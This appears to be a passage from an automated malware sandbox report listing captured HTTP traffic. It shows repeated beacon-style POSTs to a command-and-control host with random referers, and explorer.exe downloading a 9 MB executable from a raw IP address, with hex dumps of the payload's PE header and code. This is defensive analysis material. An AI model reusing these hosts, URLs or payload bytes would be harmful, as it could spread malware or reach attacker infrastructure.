73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Feb 21, 2024 00:22:40.871862888 CET	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mvrsrytepcatxa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: selebration17io.io
Feb 21, 2024 00:22:41.101540089 CET	232	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
Feb 21, 2024 00:22:45.221739054 CET	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://otwbgkjqkrfghp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 236 Host: selebration17io.io
Feb 21, 2024 00:22:45.449191093 CET	604	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Feb 21, 2024 00:22:45.642085075 CET	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://durkecnnuygoy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 170 Host: selebration17io.io
Feb 21, 2024 00:22:45.870973110 CET	243	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 10 9a 13 d8 58 d7 b8 13 b6 27 f0 3c 4c 58 23 be 65 0b 69 c3 5c 28 1f 78 9e bd 80 ba 9a 29 c5 7f 64 5d 28 e2 0d 0a 30 0d 0a 0d 0a Data Ascii: 37Uys/~(`:X'<LX#ei\(x)d](0
Feb 21, 2024 00:22:48.050965071 CET	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vyvhosbrmkdox.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: selebration17io.io
Feb 21, 2024 00:22:48.279010057 CET	604	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Feb 21, 2024 00:22:48.382863045 CET	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://orqebfbtqbuler.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: selebration17io.io
Feb 21, 2024 00:22:48.620395899 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 1b 13 a6 40 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 51 74 62 b8 1b 0e 7e cb af 9a a5 02 c9 a0 c1 b9 dd 7a 4d 0c 4e 19 e0 3c 95 a9 18 aa f5 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6a a1 c0 4a 9c 03 fd ec 9a aa 7b ac 87 2f bd 61 0d 80 5c bf 46 30 fd f8 12 6c 33 6c 2b 7c 0a 0d c7 fd f4 0e a4 ab 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 eb 2a b9 22 e7 cc 23 b2 65 0f 31 79 be 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 94 7b 39 7e e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e 42 ee 11 ee c3 de 57 a3 4c 89 85 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 81 e6 7f 74 79 e0 6d 43 cc bd 8b 8b e1 fa 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 45 de d9 37 00 40 e3 1c c9 20 f5 52 48 58 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e cf 9f ce ec 35 48 c3 a7 0d a2 ca d4 5f b5 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 09 b6 da c3 e8 c8 2f c3 e2 09 e8 8b c3 1e ac 18 b8 77 b3 0e 35 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 8c 6b 93 94 12 f9 22 d9 ed 1f b2 52 dc 1a 6e 8b 18 57 23 01 7d 42 a5 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 35 8c 57 7a 14 0f 5b 30 5f 62 ae b8 78 fe b1 8f 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 11 20 b2 6d f5 62 27 28 74 1c 5c 5a 16 9f 19 5f 11 9f 68 f9 e4 15 2a 01 6e 59 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 41 82 e3 c2 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 a1 04 85 d4 9c 97 2e 60 ce 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ed fb 91 35 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 0b 2e 58 03 41 aa 6e 22 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 03 36 18 c5 07 1f ad d6 2b 52 3c 20 4f b2 cf dd a9 8c 29 02 f9 a0 71 99 09 3b 41 6e d5 06 50 72 d0 84 b4 ae f5 47 22 fb fc 8e 62 40 46 87 1d 67 ec df 05 b1 7c Data Ascii: 1f66`;@0,xO}q4 SJ%9Wd8IkDJ8P>0%y^\Q25GH;lb]o8mWs6(pC6/'%{IyShGjT05sq733hsE\|WD<P5Q"f=(jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{~E(U@$O~Qtb~zMN<%a>\|HjJ{/a\F0l3l+\|~qhJO+yLuVW"#e1yr+Lc1<'i3FHU=hU@W{9~(B@w=fd0QpKk^NTUo)qgTBWLXh),^[}TtymCz+z(FzkE7@ RHX:M?~MpXXk%.5H_CCUb:@/w5Rk"RnW#}B.'<BV`35Wz[0_bxm^22B9G mb'(t\Z_hnYX%Sr^3Am~CvbE.`:2nJ5ig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=.XAn"=y$g}6+R< O)q;AnPrG"b@Fg\|
Feb 21, 2024 00:22:52.596232891 CET	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sgqveupilmve.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: selebration17io.io
Feb 21, 2024 00:22:52.823225021 CET	604	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49707	185.172.128.19	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:22:35.835596085 CET	189	OUT	GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.172.128.19
Feb 21, 2024 00:22:36.008279085 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:35 GMT Content-Type: application/octet-stream Content-Length: 9104384 Last-Modified: Fri, 02 Feb 2024 16:13:27 GMT Connection: keep-alive ETag: "65bd14a7-8aec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 14 bd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 8a 00 00 08 00 00 00 00 00 00 ae 00 8b 00 00 20 00 00 00 20 8b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 8b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 00 8b 00 4b 00 00 00 00 20 8b 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 e0 8a 00 00 20 00 00 00 e2 8a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 05 00 00 00 20 8b 00 00 06 00 00 00 e4 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 8b 00 00 02 00 00 00 ea 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 8b 00 00 00 00 00 48 00 00 00 02 00 05 00 90 ea 8a 00 d0 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 b8 c2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a 00 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELe @ `@`K @@ H.text `.rsrc@ @@.reloc@@BH'0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&0/ssso,oo
Feb 21, 2024 00:22:36.008371115 CET	1286	IN	Data Raw: 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b 2a 0e Data Ascii: 0(i+i]aXi26((+0c (~-s~(+(++ i]XX _(X 2(!*0w{X _}{
Feb 21, 2024 00:22:36.008476973 CET	1286	IN	Data Raw: dc 16 2a 11 04 2a 00 00 00 01 28 00 00 02 00 1a 00 8a a4 00 0c 00 00 00 00 02 00 12 00 a0 b2 00 0a 00 00 00 00 02 00 0b 00 b3 be 00 0a 00 00 00 00 13 30 01 00 18 00 00 00 0c 00 00 11 72 49 02 00 70 28 12 00 00 06 0a 12 00 28 49 00 00 0a 2c 02 17 Data Ascii: (0rIp((I,0(JoK(&06(L(M((L(MYj/&//(!lSystem.Re
Feb 21, 2024 00:22:36.008548975 CET	1286	IN	Data Raw: 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 Data Ascii: st223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnx
Feb 21, 2024 00:22:36.008615971 CET	1286	IN	Data Raw: 4b 07 ce 01 ff 8e 15 2a 70 ee 00 fb ff 11 75 67 89 47 f8 b3 45 cb 00 72 00 32 8b 34 f8 67 05 a2 d5 f9 00 34 81 8b db 46 06 32 7c ea 6a 09 5f b3 3d 05 d6 e7 00 e8 00 78 00 06 1f 1c e0 83 80 32 68 db b1 f2 00 cd 15 29 70 e6 00 e3 85 90 fb 8c ff 24 Data Ascii: K*pugGEr24g4F2\|j_=x2h)p$Vd'CrOGmt_l[ffna2PVr2(5V]=22d2qji^t\,\P(\bQ\UDX\|;tX6fX6.3XjsX
Feb 21, 2024 00:22:36.008682013 CET	1286	IN	Data Raw: f6 0c 27 84 c2 74 00 cd 00 46 12 c4 c2 72 00 32 ff 05 02 8d c7 e7 17 f3 44 57 08 2b c3 54 89 25 8b 77 24 7a c6 75 02 71 5f a5 66 e7 17 f3 44 57 08 2b c3 ba 17 b9 44 17 08 2d c3 fe cc bd cc aa cc a2 cc c2 9a a3 80 74 e9 15 12 32 00 89 ba a2 80 32 Data Ascii: 'tFr2DW+T%w$zuq_fDW+D-t2223qg]e`2UPs237aoV*2Yd2tnjxs-73}qUf
Feb 21, 2024 00:22:36.008750916 CET	1286	IN	Data Raw: e2 b2 00 9a b1 15 00 71 a3 42 1f ef 00 90 f9 55 00 74 85 f2 7d 3a 6a 3b e8 0c 0e 32 00 28 e8 df 24 6e 00 fd c0 0e 08 1e 09 da 6d 3c 00 33 59 21 e8 17 0f 71 00 3f 3b a8 74 7f 50 9b 5b 7a 00 32 59 da 50 17 00 72 84 6f c4 05 06 69 b7 23 c8 93 03 19 Data Ascii: qBUt}:j;2($nm<3Y!q?;tP[z2YProi#-QbVZ3@r2E9$2b25E{}bQP2Y(e=EO2u5P"qnEwAre+22/r1fyQx2}@2]!
Feb 21, 2024 00:22:36.008882046 CET	1286	IN	Data Raw: 81 8c 00 7b 00 73 83 be 7f 54 89 66 24 35 d9 1e 24 34 c3 d8 00 66 08 6e 74 7e b8 74 00 74 00 f1 dc 37 d0 49 80 72 b8 33 00 71 00 a5 8b 2c 04 5d 00 73 f0 0b 3d 32 00 c2 7f 47 03 af 02 f1 8b 33 04 e5 ec 64 0d 78 00 8c 7f fd 44 16 06 b9 42 37 8b 78 Data Ascii: {sTf$5$4fnt~tt7Ir3q,]s=2G3dxDB7xzD\P$9r2BbD\VtM=25$nD$,ZffLdtpfStaT qfx),Z5$b]s&Vv$uKxtI=2G_6$=
Feb 21, 2024 00:22:36.008924961 CET	1286	IN	Data Raw: 3d 32 00 ee 5d 8a dd 77 08 28 dc 3b f8 37 df 98 f6 b7 44 0e 0e 64 53 da f0 0d 00 72 dd 77 f8 28 59 8d 22 98 c3 58 75 9e dd 31 f8 61 83 de 10 ee 5c 56 08 ef 45 79 dd 7a 24 04 0c 12 10 9b 87 48 00 32 83 f6 1c 6d 5b bb c3 fe cc bd cc aa cc a2 cc be Data Ascii: =2]w(;7DdSrw(Y"Xu1a\VEyz$H2m[3xF{fn=raAGdmr2t=s239t8F3rr2-3UtS@3n1@n:
